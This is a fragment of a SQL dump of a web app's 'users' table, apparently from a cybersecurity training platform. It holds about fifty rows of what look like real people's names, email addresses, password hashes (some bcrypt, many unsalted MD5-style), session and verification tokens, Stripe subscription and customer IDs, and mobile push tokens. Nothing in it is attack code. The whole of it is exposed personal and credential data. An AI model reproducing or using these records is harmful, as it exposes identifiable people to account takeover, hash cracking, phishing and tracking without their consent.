(246, NULL, 'MOHAMED AMINE', 'amine.chorfi@biat.com.tn', '$2a$10$yHnphwlBmujqBRrDMp/M8e1pza3QXE2U8vH.x2od6kkue.u0wTNc6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-05 10:48:30', 'Méd Amine', 'CHORFI', 1, NULL, '48beca67d8a479343c3a6d3bc1932dfb7f62328d33cc72bb09a4f642efce1a72', '2026-03-05 11:49:26', 0, NULL, NULL, '2026-03-05 07:48:30', NULL, 1, 0, NULL, 'bb2c39163b33a94e348412326b6fb0740e67fd1654440393c1751ee87ec8b364', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(247, NULL, 'zhou', 'lovebingheji@gmail.com', '3dc2cefddae98b3d60e1313eba59b289', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-05 14:37:07', 'lovebingheji5fc3fb', 'k', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-05 11:37:07', NULL, 1, 0, NULL, '97080cfce37c80bf96c2af63ccfc73b19d1f4a8689c69b0817faff32932d1002', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(248, NULL, 'Derrick', 'derrickngugi130@gmail.com', '27f41482939d48b54bf8a2377451a00e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-05 20:39:47', 'derrickngugi1308f996c', 'Ngugi', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-05 17:39:47', NULL, 1, 0, NULL, '6c4812efcb6de41e3399406f890942836d4e8809262caebb0517d6484dd4dca1', '9c897a8e98fc7aefde9b8ed5943e9fcfc005db61173a80079d9e6f0ce076936c', 'NDR', 'CLOUD', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(250, NULL, 'Abdelrahman', '3216410aaa@gmail.com', 'b514cea9d01aba63832cbf60302c7cd4', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-06 05:52:53', '3216410aaab40094', 'Tamer', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 02:52:53', NULL, 1, 0, NULL, '02809115e3b1249c06762acc74515ccc28fd86561ce23cb1d6a843a184634651', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(251, NULL, 'Love', '2301301050.love@geetauniversity.edu.in', '80afdf43fac625962f7b4058cfead4c2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-06 07:45:11', '2301301050.loved5d8cd', '.', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 04:45:11', NULL, 1, 0, NULL, '6b20ac1c84b044f01c73047455e4f06132f6830585b6e679754361b6d38233b8', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(253, NULL, 'dazai', 'pcno49eillhe@melbourne.edu.pl', '$2a$10$YB6Oz5jjo6CkPlw8fY8T1u7MKmTINJCDeRw.BOiF/iHM2upp0ic0a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-06 08:02:06', 'dazaimuller1', 'muller', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 05:02:06', NULL, 1, 0, NULL, 'ea5bded04e9bff778a93477a1b96fa51c9177a45849ccf141069ed21075013ad', NULL, NULL, NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(254, NULL, 'priyanka', 'priyankalokkadam@gmail.com', 'bbd1e4b60cc7e4712f94fd8da576a3fd', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-06 10:04:37', 'priyankalokkadam6b1303', 'kadam', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 07:04:37', NULL, 1, 0, NULL, '74b8e8605049321be6acc62ac1a5c11bd8e78b64d17b422fe0944c3bc8bb52d5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(256, NULL, 'aman', 'qkl0vc1xkz2k@tokyo.edu.pl', '$2a$10$MzllGD/pfc0gT9PimplWYuSXpOqEuvhlbH4yRfPXcDWjyBxoD7MZ.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-06 11:25:32', 'hacker1234567', 'bhosdu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 08:25:32', NULL, 1, 0, NULL, '2cb3c267df0525387f82a538f67d79ab7ec611f4ab3d04754ab5874f3cd0394f', NULL, NULL, NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(257, NULL, 'Arif', 'arifss2024@gmail.com', '79c74035a10046c73bc4e47abff7602a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-06 13:11:34', 'arifss202460d4b5', 'Shaik', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 10:11:34', NULL, 1, 0, NULL, NULL, '5220cc537d348c5a829aa3755ec1a5bb3c39034d5030fc2405d77e00544f5d1f', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(258, NULL, 'عبدالرحمن', 'aytoday70@gmail.com', 'cd03f01912d2d994b36e41747ce3b294', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-06 18:19:10', 'aytoday701f0552', 'يوسف', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 15:19:10', NULL, 1, 0, NULL, 'df0db934ac90b888ae98abbb0d93219bba7cd4bf5fa4f69ed53ee739059cf200', '65e20a082cf0b0446d1344e61afa27c48154611beec0b8b99c031d883df6da29', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(259, NULL, 'Ishaku', 'ishakuanjili@gmail.com', '$2a$10$mskfCsa6uOYPbgTw9o3MMObWtrRxbC6Gm2jPsxcCF6TIKecw0DcVG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-07 00:08:23', 'Awesome', 'Anjili', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-06 21:08:23', NULL, 1, 0, NULL, '3130bb5628f1a06d287b87a4045e270f12678be07c82a140315d48e132df36f7', '98b4a5a13f60e661f13d9ee41c8e086bb8cc14ea7a838ac737a37a2bbe15eeeb', NULL, NULL, NULL, NULL, 0, NULL, 'android', 0, 1, 0),
(260, NULL, 'Priyendu', '2401301156@geetauniversity.edu.in', '$2a$10$mSyWGnD5ksNKIuOMMFmrcOEeilzSiVKir/ugNZB7BPUWhstd.FuJe', 'pro', NULL, 'monthly', 'active', 'sub_1T8HxpL5VKtXn66bbQKuhyeY', 'cus_U6Uo9oFZQo6jDT', 0, NULL, NULL, NULL, NULL, 0, '2026-03-07 11:24:52', 'Priyendu', 'Priy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-07 08:24:52', '2026-04-07 13:20:07', 1, 0, NULL, '18b25fa7e85c390c9617ec156437809bc15b07b97b4541280abb4a7b745d8eba', NULL, NULL, NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(261, NULL, 'Nitesh Sharma', '2409301013@geetauniversity.edu.in', '11cf22191af4e23b4c17ccbdbe6da9f8', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-07 11:27:43', '24093010137917cf', 'GU 2024 Batch', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-07 08:27:43', NULL, 1, 0, NULL, '9c004a1737b71c6e7aac5238cee99699bf1e308e6ba5a1f3a84c7244ddd6b631', NULL, 'SIEM', 'NDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(262, NULL, 'Osman Onur', 'osmanonuruyar@gmail.com', '594dade303004a768f7ecd4468aa9382', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-08 21:31:42', 'osmanonuruyar0705db', 'Uyar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-08 18:31:42', NULL, 1, 0, NULL, NULL, '361d8c1bc1725097cf70f887726fc571835a2d87bde704bdf5d7e0d478d676f4', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(263, NULL, 'm.', 'mu642955@gmail.com', '641a5e5c8568d72e17bf3c462470ee4b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 01:30:57', 'mu64295504a810', 'umar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-08 22:30:57', NULL, 1, 0, NULL, NULL, 'b73b55a483d4dddfc6ec5b9142ef8fffe246bf2cf05dea052ec79783a997b680', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(264, NULL, 'Vitor', 'vitorfernandes1993@hotmail.com', 'c0f097a65252036e74efe6cc32ab7371', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 12:41:21', 'vitorfernandes199382505b', 'Fernandes', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 09:41:21', NULL, 1, 0, NULL, NULL, '5cc6d29a247d02bc76f7f151e78a613279f1a776b69a3c4904554786292c6e69', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(265, NULL, 'Lex', 'tau.lexnedry.1713451036499@gmail.com', 'a3567392bb3894898f455e2b380aa720', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 14:10:00', 'tau.lexnedry.17134510364996dfd3b', 'Nedry', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 11:10:00', NULL, 1, 0, NULL, NULL, '7c79e9725d8889b27df031c0f8761bac78a6fffa4b925cf29032f29708800e18', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(266, NULL, 'shriyareddy', 'shriyainala19@gmail.com', 'b2e60ac3db51105a1fa32e1b5d156cf1', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-09 15:09:24', 'shriyainala196c3e04', 'inala', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 12:09:24', NULL, 1, 0, NULL, '882740a98bfe63ccb14a435581ac33ad6e4c9f3a9b609753a1431c2e9eb39c62', '95f3869287a370e37b976289e858a07259b98d3b212c2ca1cd63d5e5ececabba', NULL, NULL, 'ExponentPushToken[xWDdiNBzveaMYaBLITtSds]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(267, NULL, 'Aditya', 'adityakumarbth72@gmail.com', '06aac93cb43cbcbeedb9cd68c4e08ee4', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-09 22:38:54', 'adityakumarbth72390b1b', 'Raj', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 19:38:54', NULL, 1, 0, NULL, NULL, '91bb817d04c22aa26013a92ebe84a8db555c1968955827e69b48a514e484ef64', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(268, NULL, 'Karl', 'pentesterbach@gmail.com', '45a4dc4bef77efb726330298273d0f91', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 02:49:10', 'pentesterbach5e1c33', 'Nichols', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-09 23:49:10', NULL, 1, 0, NULL, NULL, 'dc6e7b6335d47dcc7092cd05cd3eecebeb9f7289d6ade1d5dca7c2f1486e2fc7', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(269, NULL, 'DARK', 'dark22dragon0@gmail.com', 'ffca95bde80be3b5fa60a25739fadc88', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 06:37:12', 'dark22dragon0d01669', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 03:37:12', NULL, 1, 0, NULL, NULL, 'c9e22dbdd5abcea51b8cf109ed2da7c9c3d0f026587a716d517b35ea80c3a425', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(270, NULL, 'Ayush', 'dhumalayush2710@gmail.com', '703facadbfde0f1f0666dd380cbf0449', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 07:25:32', 'dhumalayush271046068c', 'Dhumal', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 04:25:32', NULL, 1, 0, NULL, NULL, '16aedbe496af06afa0523d1762799c10d609bd4d3219c9d9ec258bc4ddfda369', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(271, NULL, 'Love', 'chhokerluv@gmail.com', '8fe7983d9325fc68ce87b11777846749', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-10 08:07:59', 'chhokerluve40529', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 05:07:59', NULL, 1, 0, NULL, '14b28d75562862740dec805e35b58328837d3f02c35ba1d44023c29fdffe73c4', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(272, NULL, 'Marium', 'kasykasy0246@gmail.com', '$2a$10$czfNoZntcFTiWM.8qWKjxuxcU3iXC6XG43Q9YJDiLV0n3p1.4RSOG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 14:07:43', 'Marium', 'Tanious', 0, '90dc7535b5ff8fc1a07f7df493e65c7d66468abdd3f85fc631b5a28414081457', NULL, NULL, 0, NULL, NULL, '2026-03-10 11:07:43', NULL, 1, 0, NULL, 'f1abcb9f199428486ed262186b2c3f0f14097408611228c76406da27b3fc701b', NULL, NULL, NULL, 'ExponentPushToken[SeZia1F7W7uzbOfLiUi3M0]', NULL, 0, NULL, 'ios', 0, 1, 0),
(273, NULL, 'Ma', 'madom3630@gmail.com', '$2a$10$t/rStDSZUczfjC4KLttUNO6.686pq9P1MQiVhawZ/o1j59YduJv4q', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 16:55:17', 'Madom', 'Dom', 0, '4b23ee5190aff7094eeda046e87958b1a8e251a9dedca60e636ae1e5cd7728d6', NULL, NULL, 0, NULL, NULL, '2026-03-10 13:55:17', NULL, 1, 0, NULL, '81791ad79b96d7a3a49be23cf2403d2b63a6c54c8ae62d53ed6eadbbde189538', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'android', 0, 1, 0),
(274, NULL, 'naresh', 'nareshboda5624@gmail.com', 'bee7031aa73633bc8dcb5e5b8637ac9b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-10 23:57:36', 'nareshboda5624ae90fd', 'boda', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-10 20:57:36', NULL, 1, 0, NULL, NULL, 'b9d344ccf32b51e4b0882bfcb7484844325d411e4e67742d1f9cda6dccf83c96', NULL, NULL, 'ExponentPushToken[6brEGmKgPN9QYn6989wMzt]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(275, NULL, 'ronald', 'Roncamp6233@gmail.com', '$2a$10$oMWHRCfmpJ.fxERY.Y1SIelD76LEHJz49CXZ6C.RuOxeDuzZj5FL6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 05:54:26', 'Ronaldnc623', 'Campbell ', 0, '0a4d37b699f643d9a1786ec6e24c317f3b896bb641dd7670788fa55fe77f4dc4', NULL, NULL, 0, NULL, NULL, '2026-03-11 02:54:26', NULL, 1, 0, NULL, 'd0260c8c64e90bc2d72fc0e0208849cefabd3aa26c8f9f39ef6d2102fcc64c68', NULL, NULL, NULL, 'ExponentPushToken[1NJAakCApkq6RWppHWBpXh]', NULL, 0, NULL, 'ios', 0, 1, 0),
(276, NULL, 'lily', 'Sapwelllily7@gmail.com', '$2a$10$OL7sSZVqhKmyuIlmIgxxMO3A2.wxAf9aeJIhIMBY/0rejhg.8Qnku', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 11:19:32', 'Unknown_unicorn ', 'Sapwell ', 0, 'ee75e0a8d6e66cf7e71655db848b8b4756d0c024f0575246a65411a44f049c7b', NULL, NULL, 0, NULL, NULL, '2026-03-11 08:19:32', NULL, 1, 0, NULL, 'e256f5b57a23917409f77543e3e9e4ce53fc0787859a66c722d0b0708b31fdca', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0);
INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `mobile_session_token`, `primary_path`, `secondary_path`, `expo_push_token`, `banner_url`, `is_student`, `organization_id`, `registration_source`, `verification_reminder_sent`, `is_subscribed_newsletter`, `first_push_sent`) VALUES
(277, NULL, 'Daniel', 'Daniel.alfredo19550@gmail.com', '$2a$10$RHPBI4VyEgqveYeDd9JOfuDS1XeuruPKJMC7dnN1BiWN7iUpxj6sG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-11 14:43:13', 'Dannealf', 'Alfredo', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 11:43:13', NULL, 1, 0, NULL, '0d880261cf23fe4562c918bec3349050759fd56d7f0744b043b90454e6a25783', NULL, NULL, NULL, 'ExponentPushToken[oDq1Z9K-LGE4wh-NbJGhDp]', NULL, 0, NULL, 'ios', 0, 1, 0),
(278, NULL, 'Shefrin', 'shefreen323@gmail.com', '7acd95e79ead617e39c384e5f237caa7', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 16:28:03', 'shefreen3239a85e0', 'K', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 13:28:03', NULL, 1, 0, NULL, NULL, '25e13c7d7bd27c332ebfb4d4e72fbe6e7cc8bb8a3e495e95bba097cdd7997d29', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(279, NULL, 'Gopi', 'gopioffcial2002@gmail.com', '4bc4f79449a5ccad56fe5f43ac941016', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-11 16:41:13', 'gopioffcial200286efec', 'S', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 13:41:13', NULL, 1, 0, NULL, NULL, 'c991ddccf8bbe0135a4feba843a1488606a3a60444c6c208c2284b5009262558', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(281, NULL, 'Hayden', 'haydenatchesen555@gmail.com', '143e5a0c4ab4d30a66bffa99c096964f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 01:36:21', 'haydenatchesen555bcec89', 'Atchesen', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 22:36:21', NULL, 1, 0, NULL, NULL, '82a068c15318dec36383649ace630e75e45283a10fbbd7e30942149cc8f264de', NULL, NULL, 'ExponentPushToken[T1U57DIjlfjUpLvnYkQRwK]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(282, NULL, 'Екатерина', 'mirniysvet2@gmail.com', '$2a$10$QIi2AbROZMO17l7WDkVoZeLApYArnAocOeUUKCHuSun.nPCIkS7b2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 02:46:33', 'emelyanovakt002cad', 'Емельянова', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-11 23:46:33', NULL, 1, 0, NULL, '15974088bc981c168fe996515a0fea3e5a8999dcc0d34fc2f11a9b87470de4de', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(283, NULL, 'Ekaterina', 'emelyanovakt@gmail.com', '$2a$10$2Th6tH6.gdrj9obncFqhgeWf2LS523DXwcT/26xxJkxCBjllNjrx2', 'pro', NULL, 'monthly', 'active', 'sub_1T9wmQL5VKtXn66b90LWradv', 'cus_U8DCNq94L9e3QB', 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 02:57:48', 'emlkt', 'Emelyanova', 1, NULL, NULL, NULL, 1, NULL, NULL, '2026-03-11 23:57:48', NULL, 1, 0, NULL, '2e38119d4c4e41060f446ce1e0c2c878f7035bf65618d19004fefbd515dd5e1d', NULL, 'TI', 'SIEM', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(284, NULL, 'Ciya', 'ciyalalu.7279@gmail.com', '204564baef2f31233d167d0bc6803b2c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-12 07:41:54', 'ciyalalu.72791cce81', 'Lalu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 04:41:54', NULL, 1, 0, NULL, NULL, 'bee51da663b4d85088ebe85bd0b49bcca1dd0ea80cd31d750a6198d17c0973e8', NULL, NULL, 'ExponentPushToken[ivcu4mG0dwqsH1hoKIx7rN]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(285, NULL, 'Eva', 'emgq5553@gmail.com', '$2a$10$Zg.GnqqsLtMZUyt20coz/e3O9MvujSysuax939s96auIOcJfVFzbC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 10:19:13', 'evamariiaxx', 'Gonzales', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 07:19:13', NULL, 1, 0, NULL, 'f0e72c396742f399da6ca3d34460b526ce38bab1c80a1f5ede8b5c91fd5e2209', '39753090e27e598ed0e4b99039b205623ed002f25bd4ff1e55ba1988fbf22aa8', NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0),
(286, NULL, 'Eva', 'evagonzales706@gmail.com', '454a082002e7ac8d274a29c451a3470b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-12 10:27:07', 'evagonzales7061374f7', 'Gonzales', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 07:27:07', NULL, 1, 0, NULL, '38cd1625e7f1b539ab91971a4f98a1619df88940944e21db5f5d2f81573bff5c', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(287, NULL, 'Nitesh', '2409301028@geetauniversity.edu.in', '$2a$10$CKNeLF/AEn38O9.ttUJQHeobYgneoSOJ349oLA0TLEs7Mzidmi196', 'pro', NULL, 'monthly', 'active', 'sub_1TA4jqL5VKtXn66bIgpAPyEX', 'cus_U8LQaCs9NnP1KV', 0, NULL, NULL, NULL, '2026-04-12 11:37:05', 0, '2026-03-12 11:34:56', 'nitesh_sharma', 'Sharma', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 08:34:56', '2026-04-12 11:37:05', 1, 0, NULL, '39de00c6b68ef16ceffddb28a5c66a0a74977aeed11e971060b4f9c186ff573b', NULL, NULL, NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(288, NULL, 'Bruce', 'Phasookr@gmail.com', '$2a$10$0/Nd289fu9t2ddDV1nfbZ.jRhwoGeXYtztVP84QxsFWL2Cx6IH9kG', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-12 12:30:44', 'Rphasook', 'P', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 09:30:44', NULL, 1, 0, NULL, 'e8e41abb845a2eb1b4ade94350486d368792ff52a07ceffd2be62123d1276cf5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'ios', 0, 1, 0),
(289, NULL, 'Cordae', 'catchesen@gmail.com', '3e80072769768a5aff5d6388a65a600f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-03-12 13:05:41', 'catchesenbcb44e', 'Atchesen', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 10:05:41', NULL, 1, 0, NULL, NULL, '59814c07a36fbb4cb3442d21fc9200775ed02085131070839985a00bb9a684a4', NULL, NULL, 'ExponentPushToken[nYJKtKKGJpgTQ-N-5Ay0wS]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(290, NULL, 'Jason', 'jason.allen.lang@gmail.com', 'a4ddc5958106e817b33545910d24818d', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-12 16:49:36', 'jason.allen.lang20cfdd', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-12 13:49:36', NULL, 1, 0, NULL, '67b55dfcaff7245379f2df2b6b2c44983d1988f356c2810548f291813d1bb86d', '26f5068aef412c467faa4c60226c054098c7c14062bbb713683987e254f7e941', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(291, NULL, 'Senih', 'senihgocek@gmail.com', '$2a$10$igchxqktSUB3mQdf.L6lKOH4avKeiOA1BY3oI93z7wn0ATR5u8S7O', 'pro', NULL, 'pro', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-13 03:33:30', 'senihgocek', 'Gocek', 1, '3e77b5887b84f00a1c4caa5d2e651e20ce356bd6827ff5dd612b45ddaf456012', NULL, NULL, 0, NULL, NULL, '2026-03-13 00:33:30', NULL, 1, 0, NULL, 'f8076b13d6ef8a0db6ec6ac64a8bc4a20223c04081de3113c455431bf863995e', NULL, NULL, NULL, 'ExponentPushToken[iSvoBhI_0PWq_fZ2ArPsKF]', NULL, 0, NULL, 'ios', 0, 1, 0),
(292, NULL, 'Jedrzej', 'jedrzejstrokosz@gmail.com', '$2a$10$hXLWCD66D0I/aWQITt1SpO4sXYVC0xqsyGj0ChRm3LT9iPvMy9EVm', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-13 12:01:21', 'jj077', 'Strokosz', 0, '583b6a7e8fd5698cb6d891bc6c5baa40052f93a3380ddb49245bae3b03366bde', NULL, NULL, 0, NULL, NULL, '2026-03-13 09:01:21', NULL, 1, 0, NULL, '7fc6d36281d04823350c735e8cc78ad2a578ba10febe69edb3366a6ab34c1ed4', NULL, NULL, NULL, 'ExponentPushToken[ZIvD84DhYQF1BUO2tpbXzL]', NULL, 0, NULL, 'ios', 0, 1, 0),
(294, NULL, 'Aaron', 'notgriefzgg@gmail.com', 'c78628a1ffaf59890202b1b20719373e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-14 07:14:32', 'notgriefzggcf59cb', 'Payne', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 04:14:32', NULL, 1, 0, NULL, NULL, 'd546b1380c238fdd651e5a0a0e79d9d5e8e2f102afaf2eb73d3aff7c2c4d5e0a', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(295, NULL, 'Dante', 'danteellis05@gmail.com', 'd402267de3ffae2f7c28e80c1e74908b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-03-14 09:24:01', 'danteellis058348b7', 'Ellis', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 06:24:01', NULL, 1, 0, NULL, NULL, 'de8e1f370f61f2f4c60ce33f5a113821a4188ef3da37b4433239c3e22f881dd7', NULL, NULL, 'ExponentPushToken[B4V9R4H3-3jXiJBRhrT8k9]', NULL, 0, NULL, 'mobile', 0, 1, 0),
(296, NULL, 'Dezi', 'afangnikossouherbert@gmail.com', '$2a$10$SzIOwRA6YJGt2EDBpxAds.qJJmPPXR.AGp8pVX.vYbOtAVYd3TiLu', 'normal', '/uploads/296-1773523875731.png', 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-14 19:24:37', 'dezistledger', 'St Ledger', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 16:24:37', NULL, 1, 0, NULL, '36f244f28663e0c029ab6ad38b10ca703561cf1889788fae09306a3aab21c122', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'android', 0, 1, 0),
(297, NULL, 'Sony', 'sonywiratama9800@gmail.com', '27e6af38f73053bb6627bce0d5ccb796', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-14 19:34:43', 'sonywiratama9800cc676c', 'Wiratama', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-03-14 16:34:43', NULL, 1, 0, NULL, '1a517ca90dc92269fabfba9115224ceac3b183d210df5742e240cab099a1b91a', 'f3debf0d93672570264ea7ced44979cbdb1e9e683c0ec1e4cb9e43bf2bcb9b93', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
